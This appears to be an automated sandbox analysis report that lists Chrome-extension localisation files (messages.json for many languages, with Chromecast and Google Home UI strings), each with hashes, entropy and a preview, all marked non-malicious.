                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Zamrzavanje".. },.. "1213957982723875920": {.. "message": "Koje od sljede.eg najbolje opisuje va.u mre.u?".. },.. "128276876460319075": {.. "message": "Otkrivanje ure.aja".. },.. "1428448869078126731": {.. "message": "Ujedna.enost videoreprodukcije".. },.. "1522140683318860351": {.. "message": "Povezivanje nije uspjelo. Poku.ajte ponovo.".. },.. "1550904064710828958": {.. "message": "Glatko".. },.. "1636686747687494376": {.. "message": "Savr.ena".. },.. "1802762746589457177": {.. "message": "Glasno.a".. },.. "1850397500312020388": {.. "message": "Vidite li svoj Chromecast u $START_LINK$aplikaciji Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3"..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\hu\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15682
                                                                                                                                                                Entropy (8bit):5.354505633120392
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:CCEAproS9fZv+JwkDMrC2NSxoSgbV6c8TEKdl:5r5VZv+RDMrazoV6uml
                                                                                                                                                                MD5:8E9FF7E49473C5734A2F6F0812E12EB3
                                                                                                                                                                SHA1:A4F10DDD1580582533D5EB59EDF6D8048F887C81
                                                                                                                                                                SHA-256:6CDD2FB39ADECE00E88B989E464B05ED1414092D0492F6D0AE58D549BFD1A46A
                                                                                                                                                                SHA-512:E9A4AF31B1A276F395599BB620A3164CABF3459F3C102DD3F57DFEA734510BD985DE65CB409E1975559ACCC615075439A08E1DEBE22C90A0ABCAA3CAFEE79AC7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Lefagy".. },.. "1213957982723875920": {.. "message": "Az al.bbiak k.z.l melyik jellemzi legjobban h.l.zat.t?".. },.. "128276876460319075": {.. "message": "Eszk.zfelfedez.s".. },.. "1428448869078126731": {.. "message": "Vide. folyamatoss.ga".. },.. "1522140683318860351": {.. "message": "Sikertelen kapcsol.d.s. K.rj.k, pr.b.lja .jra.".. },.. "1550904064710828958": {.. "message": "Folyamatos".. },.. "1636686747687494376": {.. "message": "T.k.letes".. },.. "1802762746589457177": {.. "message": "Hanger.".. },.. "1850397500312020388": {.. "message": "L.tja a Chromecastot a $START_LINK$Google Home alkalmaz.sban$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content":
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\id\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15070
                                                                                                                                                                Entropy (8bit):5.190057470347349
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:GsprMtChjkWfrEWL0KRCnEOWV6c8TEKdl:9rtAEr3LTRuWV6uml
                                                                                                                                                                MD5:7ADF9F2048944821F93879336EB61A78
                                                                                                                                                                SHA1:C3DA74FB544684D5B250767BB0CB66FFB7C58963
                                                                                                                                                                SHA-256:3630947E1075E3663AD3E4824D0BE42CB47C0D615D8053E83B9595047C8BA9BE
                                                                                                                                                                SHA-512:1F28BB80E1839C5581106BEA3AE2501C7618249D7E3115819F5A9A87771D59F5DE346C1B9C87F7FFC390604D5B9888CE738E25F2F04A094002A0FB3B22CBEC95
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Membeku".. },.. "1213957982723875920": {.. "message": "Dari berikut ini, manakah yang paling mendeskripsikan jaringan Anda?".. },.. "128276876460319075": {.. "message": "Penemuan Perangkat".. },.. "1428448869078126731": {.. "message": "Kelancaran Video".. },.. "1522140683318860351": {.. "message": "Sambungan gagal. Coba lagi.".. },.. "1550904064710828958": {.. "message": "Lancar".. },.. "1636686747687494376": {.. "message": "Sempurna".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Bisakah Anda melihat Chromecast di $START_LINK$aplikasi Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\it\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15256
                                                                                                                                                                Entropy (8bit):5.210663765771143
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:lYprk52dAaykVza8rE0QWBKD9+vq0hKEV6c8TEKdl:qrlA8r6DalV6uml
                                                                                                                                                                MD5:BB3041A2B485B900F623E57459AE698A
                                                                                                                                                                SHA1:502F5EA89F9FB0287E864B240EA39889D72053A4
                                                                                                                                                                SHA-256:025737EF8FA06706B3F26D0F52B4844244A6D33DAE1D82FEF2931A14C003D57E
                                                                                                                                                                SHA-512:BA51784073BEF82F3A116B33DA406FDB10EC823B9EE74375C46036DAD8BDCB4141F60845DE141ABE42CEEF9251572F6AB287CA5FC7669C60E4F68071D5AB8C2D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Si blocca".. },.. "1213957982723875920": {.. "message": "Quale delle seguenti definizioni descrive meglio la tua rete?".. },.. "128276876460319075": {.. "message": "Rilevamento dispositivi".. },.. "1428448869078126731": {.. "message": "Uniformit. video".. },.. "1522140683318860351": {.. "message": "Connessione non riuscita. Riprova.".. },.. "1550904064710828958": {.. "message": "Fluido".. },.. "1636686747687494376": {.. "message": "Perfetta".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Riesci a vedere il tuo dispositivo Chromecast nell'$START_LINK$app Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3"..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\iw\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):18990
                                                                                                                                                                Entropy (8bit):4.903564947699091
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:xkQ0XrEGOhGUkT/Mf8eZrNj27tS+iiUfOkGEyWiycLSK8eL+D75J4X:KdrgGvDMEeZrM78fQVLZqDA
                                                                                                                                                                MD5:A991BEF47A83913A1E0EF06007D09198
                                                                                                                                                                SHA1:80BA1E8FC3E9BE8A34F73E78CED8313E54F9CC96
                                                                                                                                                                SHA-256:0F95D8BF550F14B2B704CE42911F5BD23FA9FE28D0D301F66628848B27C760CB
                                                                                                                                                                SHA-512:1B5C8196669088A884FD8E117E7EB0870B296AF493004F948D0AD4FF630B07A34F423647E55856307029B2B06CDCCEAED2F9C43B426200D28D8A19A48CEA5D42
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"1018984561488520517": {"message": "\u05e7\u05d5\u05e4\u05d0"}, "1213957982723875920": {"message": "\u05d0\u05d9\u05d6\u05d4 \u05de\u05d4\u05de\u05e9\u05e4\u05d8\u05d9\u05dd \u05d4\u05d1\u05d0\u05d9\u05dd \u05de\u05ea\u05d0\u05e8 \u05d0\u05ea \u05d4\u05e8\u05e9\u05ea \u05e9\u05dc\u05da \u05d1\u05e6\u05d5\u05e8\u05d4 \u05d4\u05d8\u05d5\u05d1\u05d4 \u05d1\u05d9\u05d5\u05ea\u05e8?"}, "128276876460319075": {"message": "\u05d2\u05d9\u05dc\u05d5\u05d9 \u05de\u05db\u05e9\u05d9\u05e8\u05d9\u05dd"}, "1428448869078126731": {"message": "\u05d0\u05d9\u05db\u05d5\u05ea \u05d4\u05e2\u05d1\u05e8\u05ea \u05d4\u05d5\u05d5\u05d9\u05d3\u05d0\u05d5"}, "1522140683318860351": {"message": "\u05d4\u05d7\u05d9\u05d1\u05d5\u05e8 \u05e0\u05db\u05e9\u05dc. \u05e0\u05e1\u05d4 \u05e9\u05d5\u05d1."}, "1550904064710828958": {"message": "\u05d7\u05dc\u05e7"}, "1636686747687494376": {"message": "\u05de\u05e2\u05d5\u05dc\u05d4"}, "1802762746589457177": {"message": "\u05e2\u05d5\u05e6\u05de\u05ea \u05e7\u05d5\u05dc"}, "
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\ja\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16519
                                                                                                                                                                Entropy (8bit):5.675556017051063
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:nkprPhQdxkRWrZe1wYpMR5wnAV6c8TEKdl:YrLRWri65wAV6uml
                                                                                                                                                                MD5:6F2CC1A6B258DF45F519BA24149FABDC
                                                                                                                                                                SHA1:8A58C7880C6D22765DCBB6BCE22A192C1B109AE1
                                                                                                                                                                SHA-256:42ECFEE727CFC4F2845FEFDACE5EDC2E0A40AFAD69973A3B950CE653A7633342
                                                                                                                                                                SHA-512:F7454F0E14301C59CC54361ACC0A1C6D072EF9BDF5DEA60646FB90B1CE47612785938C784A4CF1DE3E62648A14420374933B5F5DA43907BC00D3799FF163A3D0
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "...".. },.. "1213957982723875920": {.. "message": "................................".. },.. "128276876460319075": {.. "message": "......".. },.. "1428448869078126731": {.. "message": ".......".. },.. "1522140683318860351": {.. "message": ".......................".. },.. "1550904064710828958": {.. "message": "...".. },.. "1636686747687494376": {.. "message": "....".. },.. "1802762746589457177": {.. "message": "..".. },.. "1850397500312020388": {.. "message": "$START_LINK$Google Home ...$END_LINK$. Chromecast .........$START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\kn\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):20406
                                                                                                                                                                Entropy (8bit):5.312117131662377
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:a6C5rBSzvrZreGnla9ZBHRUDYr9yRwEcAa4rSeD5BSz0hJz8qbbM3gbr//Hkr44c:a6C5rBSzvFreGnla9ZBHRUDYr9yRwEcC
                                                                                                                                                                MD5:2E3239FC277287810BC88D93A6691B09
                                                                                                                                                                SHA1:FC5D585DA00ADC90BF79109C7377BD55E6653569
                                                                                                                                                                SHA-256:5FC705AD19761204D8604EA069936A23731B055D51E7836CAAF16AC7719FBEEA
                                                                                                                                                                SHA-512:DF8BC9E577D3ECB0E6C303E1D2C9E9A4A8317CAE810A9DFC88D91B373A4B665722C5A9AB5A589BB947FDA4C7CD9A6DF39DDD13EA47FE9EFF7E0AC43E49FF3479
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "....... .........".. },.. "1213957982723875920": {.. "message": "...... ...... ..... ........... ..... ......... ............?".. },.. "128276876460319075": {.. "message": "..... ........".. },.. "1428448869078126731": {.. "message": "........ .......".. },.. "1522140683318860351": {.. "message": "...... ........... ........ ..... ...........".. },.. "1550904064710828958": {.. "message": ".....".. },.. "1636686747687494376": {.. "message": ".....".. },.. "1802762746589457177": {.. "message": "........".. },.. "1850397500312020388": {.. "message": ".... $
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\ko\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15480
                                                                                                                                                                Entropy (8bit):5.617756574352461
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:kWprGvSQtkxWffrnl5JuFBWVZV6c8TEKdl:TrkuxKfrlT4YVZV6uml
                                                                                                                                                                MD5:E303CD63AD00EB3154431DED78E871C4
                                                                                                                                                                SHA1:3B1E5B8E2CF5EBDF5D33656EF80A46563F751783
                                                                                                                                                                SHA-256:FDE602BFDB1AFD282682DA5338C4F91D8A2F6CB5411DB8F62F4583D629CE67A6
                                                                                                                                                                SHA-512:18BA1D5A25FBC1829AD957A531B0CC490AFCBD20AC22181021363AA3CFB916270B8732E824463C9B0897220E8AE86EB1BE561D6540E6C625F08F228F61DDFFA3
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "...".. },.. "1213957982723875920": {.. "message": ".. . .. .. ..... .. . .... ... .....?".. },.. "128276876460319075": {.. "message": ".. ..".. },.. "1428448869078126731": {.. "message": "... ..".. },.. "1522140683318860351": {.. "message": ".... ...... .. ... ....".. },.. "1550904064710828958": {.. "message": "...".. },.. "1636686747687494376": {.. "message": "...".. },.. "1802762746589457177": {.. "message": "..".. },.. "1850397500312020388": {.. "message": "$START_LINK$Google Home .$END_LINK$. Chromecast. .....? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\lt\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15802
                                                                                                                                                                Entropy (8bit):5.354550839818046
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:lGxSprfkiRR+2zJckS1khrnPI85+80p3DWReV6c8TEKdl:lG4rlq0OkSmhrwbpIeV6uml
                                                                                                                                                                MD5:93BBBE82F024FBCB7FB18E203F253429
                                                                                                                                                                SHA1:83F4D80F64FA2ADCE6C515C5F663BD38A76C51DB
                                                                                                                                                                SHA-256:E7A8570922CCC4F2CA3721C4E61F426158C4E7BC90274FBC8BE4040FF8B6CA9B
                                                                                                                                                                SHA-512:B7E7878106B466CE95069141DF1DE387E847348B62E9C4D548006452F3E164B3AD842E9673A56DC011A5ECC3346B5863E2034EE477A9D1F3E0ABD76B2D0F640A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Stringa".. },.. "1213957982723875920": {.. "message": "Kuris i. toliau pateikt. teigini. geriausiai apib.dina j.s. tinkl.?".. },.. "128276876460319075": {.. "message": ".renginio suradimas".. },.. "1428448869078126731": {.. "message": "Vaizdo .ra.o sklandumas".. },.. "1522140683318860351": {.. "message": ".vyko ry.io klaida. Bandykite dar kart..".. },.. "1550904064710828958": {.. "message": "Leid.iama skland.iai".. },.. "1636686747687494376": {.. "message": "Puiki".. },.. "1802762746589457177": {.. "message": "Garsumas".. },.. "1850397500312020388": {.. "message": "Ar .Chromecast. rodomas $START_LINK$programoje .Google Home.$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\lv\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15891
                                                                                                                                                                Entropy (8bit):5.36794040601742
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:y18prUkm15wkLDG2raqhnZDuvyI762V6c8TEKdl:RrAL7rte62V6uml
                                                                                                                                                                MD5:388590CE5E144AE5467FD6585073BD11
                                                                                                                                                                SHA1:61228673A400A98D5834389C06127589F19D3A30
                                                                                                                                                                SHA-256:05CA14196CA5D90B228C0F03684E03EBE403A3E7B513AE0A059244AE12B51164
                                                                                                                                                                SHA-512:BF83AC90BC56CEB1CA12DCB47BCE542FB8CFE0BC14E34DE4FE1A84F7CDB4B54E36C125CEA7EE06EA6244F7795A0957A8A20DB30CA4C60FC6E96EF2A735448521
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".Iesald.ts. att.ls".. },.. "1213957982723875920": {.. "message": "Kur. no t.l.k min.tajiem apgalvojumiem vislab.k raksturo j.su t.klu?".. },.. "128276876460319075": {.. "message": "Ier.ces atra.ana".. },.. "1428448869078126731": {.. "message": "Video vienm.r.ba".. },.. "1522140683318860351": {.. "message": "Neizdev.s izveidot savienojumu. L.dzu, m..iniet v.lreiz.".. },.. "1550904064710828958": {.. "message": "Vienm.r.gs att.ls".. },.. "1636686747687494376": {.. "message": "Nevainojama".. },.. "1802762746589457177": {.. "message": "Ska.ums".. },.. "1850397500312020388": {.. "message": "Vai j.su Chromecast ier.ce ir redzama $START_LINK$lietotn. Google.Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2"..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\ml\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):20995
                                                                                                                                                                Entropy (8bit):5.346788032166745
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:6pQrdbhWHZTwOn1HbxytQdroExFVRnTPV6uml:X5/Utz6uml
                                                                                                                                                                MD5:0CBE2A5C0798516F665F06BC46373B6D
                                                                                                                                                                SHA1:12AE7DDF4BA59B0324DE1E2EA10BBDCEC1495753
                                                                                                                                                                SHA-256:41179A3582BE3DE2CB8A569AF22EC97AF2A42403D75E250BCAE853DBF7DDE598
                                                                                                                                                                SHA-512:72B4B8E24152569AAF582115FAF7DE83ED51DC796AB5BEBA27F1BE4B0520F1280A4EDFDAB13DD9AA2B144B4E52A2F920162C6B34F738802AEA9458C141C2ADA4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "...........".. },.. "1213957982723875920": {.. "message": "................ ..... ....... ...... ....... ......... ............. .................?".. },.. "128276876460319075": {.. "message": "...... .........".. },.. "1428448869078126731": {.. "message": "...... ...............".. },.. "1522140683318860351": {.. "message": "...... .............. ....... ...........".. },.. "1550904064710828958": {.. "message": ".........".. },.. "1636686747687494376": {.. "message": "........".. },.. "1802762746589457177": {.. "message"
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\mr\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):19625
                                                                                                                                                                Entropy (8bit):5.311040089989635
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:PbrpprGy+RmIhTmidpzlF1Akk03LQYOkQrjNjP8hZYiEQ5z+excV6c8TEKdl:PbfrGUIh7dpzxbP7KrjNjaBEYuV6uml
                                                                                                                                                                MD5:E4D38794005291B3AB72389F7C959E8C
                                                                                                                                                                SHA1:D19AAAAC79EF703FFE78371B44D9F3681414E1EA
                                                                                                                                                                SHA-256:915D323B9F7DB9E13BD50A75426B750C93EBC8699C523E72A37CB818CC33292B
                                                                                                                                                                SHA-512:F1C502582D581C088F06E95309CBD5125D6E0EA3EE0AB82DB561AAC91A9E52B361FBFD93B63BF7A73026FEDC76B8B77483AA6AD1A54760DC20496F8666897E98
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "......".. },.. "1213957982723875920": {.. "message": "......... ..... ...... ......... ............ ..... ....?".. },.. "128276876460319075": {.. "message": "........ ...".. },.. "1428448869078126731": {.. "message": "....... .......".. },.. "1522140683318860351": {.. "message": "....... ....... ..... ..... ...... ....... ....".. },.. "1550904064710828958": {.. "message": ".... ..... .....".. },.. "1636686747687494376": {.. "message": "....".. },.. "1802762746589457177": {.. "message": ".........".. },.. "1850397500312020388": {.. "message": "...... $START_LINK$ Goo
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\ms\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15330
                                                                                                                                                                Entropy (8bit):5.193447909498091
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:rCprBbx+Fkc4kYPr/pEt4EpXlIoV6c8TEKdl:CrYjer/mOE4oV6uml
                                                                                                                                                                MD5:09D75141E0D80FBD3E9E92CE843DA986
                                                                                                                                                                SHA1:B24EAB4B1242C31B69514D77BC1DB36A3F648F40
                                                                                                                                                                SHA-256:8F1DBDEFD910AD88BEEC7956619CDB34391D6E69254C3A7497E8F87134AE8B5C
                                                                                                                                                                SHA-512:935C69481F1555787FCB9A5490B3188B348284B600359239742A7D802ADD5CC8A30CC1F0942D52E620DFB388787FCD69B548BBAC590110245DF5763367A2DD5A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Tidak bergerak".. },.. "1213957982723875920": {.. "message": "Antara yang berikut, manakah yang terbaik menggambarkan rangkaian anda?".. },.. "128276876460319075": {.. "message": "Penemuan Peranti".. },.. "1428448869078126731": {.. "message": "Kelancaran Video".. },.. "1522140683318860351": {.. "message": "Sambungan gagal. Sila cuba lagi.".. },.. "1550904064710828958": {.. "message": "Lancar".. },.. "1636686747687494376": {.. "message": "Sempurna".. },.. "1802762746589457177": {.. "message": "Kelantangan".. },.. "1850397500312020388": {.. "message": "Adakah anda dapat melihat Chromecast anda dalam $START_LINK$ apl Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content":
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\nb\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12194
                                                                                                                                                                Entropy (8bit):5.525086072392163
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:xQQBkrB6Ju6kGBZZr2qP8lH42j6iycLSK8eL+D75J4X:uQqr8JuRGBZZr2O8N42FVLZqDA
                                                                                                                                                                MD5:BE6ED6423922FF31CE36E252A7BD2F34
                                                                                                                                                                SHA1:D53EF8B86FA638FFD9D0AB16DA586853075E8C2B
                                                                                                                                                                SHA-256:564476EF8631ED4694EDE12D8552A5A3D8D660C9085BD4EC4FC45514D3805B2C
                                                                                                                                                                SHA-512:07D58204D26E88DD3100BFAE4B63522766EE487ED60BD0F2288B572C6F5366D5D3E1EA3D87CEF3D6EED5FF6FD508A1F2619C75233C399D250FC1D982AE4342D3
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"1018984561488520517": {"message": "Fryser"}, "1213957982723875920": {"message": "Hvilket av f\u00f8lgende eksempler beskriver nettverket ditt best?"}, "128276876460319075": {"message": "Enhetsgjenkjenning"}, "1428448869078126731": {"message": "Videojevnhet"}, "1522140683318860351": {"message": "Tilkoblingen mislyktes. Pr\u00f8v p\u00e5 nytt."}, "1550904064710828958": {"message": "Jevn"}, "1636686747687494376": {"message": "Perfekt"}, "1802762746589457177": {"message": "Volum"}, "1850397500312020388": {"message": "Ser du Chromecasten din i $START_LINK$Google Home-appen$END_LINK$? $START_SPAN$*$END_SPAN$", "placeholders": {"END_LINK": {"content": "$1"}, "END_SPAN": {"content": "$2"}, "START_LINK": {"content": "$3"}, "START_SPAN": {"content": "$4"}}}, "1850397500312020388_ph": {"message": "</a>\ue000</span>\ue000<a href=\"https://support.google.com/chromecast/answer/2998456\" target=\"_blank\">\ue000<span class=\"required-message\" ng-show=\"!top.sufficientFeedback\">"}, "21457524299732
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\nl\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15321
                                                                                                                                                                Entropy (8bit):5.221228928144735
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:0Yiepr1oh/Kd1skosMrIpL72Izq8pXL2vVRmdKV6c8TEKdl:04r60XosMrIpLpRXL0G0V6uml
                                                                                                                                                                MD5:6DDB73E39B89687181221341448D2365
                                                                                                                                                                SHA1:FA71231ACE49AEBAD99AF747E173CCC6C7FF0126
                                                                                                                                                                SHA-256:21CAB8AF7F2ABF337CC33C51E9F4FD33A3AF08603CDDB74A30D4A05654F020FF
                                                                                                                                                                SHA-512:FD25E3DCC8DEB8B5EB2FBCAE5C2F0FDD07F507EB2BC3B8AF83CE64DC4C4B4B15D4B73903E73C9668716C609F98A8083AFD44EA59833265CCACCE958CECA65410
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Loopt vast".. },.. "1213957982723875920": {.. "message": "Welke beschrijving past het beste bij je netwerk?".. },.. "128276876460319075": {.. "message": "Apparaatdetectie".. },.. "1428448869078126731": {.. "message": "Vloeiendheid van de video".. },.. "1522140683318860351": {.. "message": "Kan geen verbinding maken. Probeer het opnieuw.".. },.. "1550904064710828958": {.. "message": "Vloeiend".. },.. "1636686747687494376": {.. "message": "Perfect".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Zie je je Chromecast in de $START_LINK$Google Home app$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\pl\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15418
                                                                                                                                                                Entropy (8bit):5.346020722930065
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:PBUprktnFwP5GkzF0r2Q3SdIucDGGmPlTV6c8TEKdl:ur2CDur2kT9aGydV6uml
                                                                                                                                                                MD5:8254020C39A5F6C1716639CC530BB0D6
                                                                                                                                                                SHA1:A97A70427581ADA902CA73C898825F7B4B4FAC8F
                                                                                                                                                                SHA-256:2F4E4FC6AEB4A8E7F0E0DCE220D66E763F4EBF1FA79985834D636C6692FEA3E8
                                                                                                                                                                SHA-512:9A2CD0F061A943CE04789FF259ECE5B3CCA11EBB6C1DF16C703F70394A5F89415E8EFB79CFB4646FC07FD261170A74602644FFF02ABD38548895CDF7DAB68EB6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
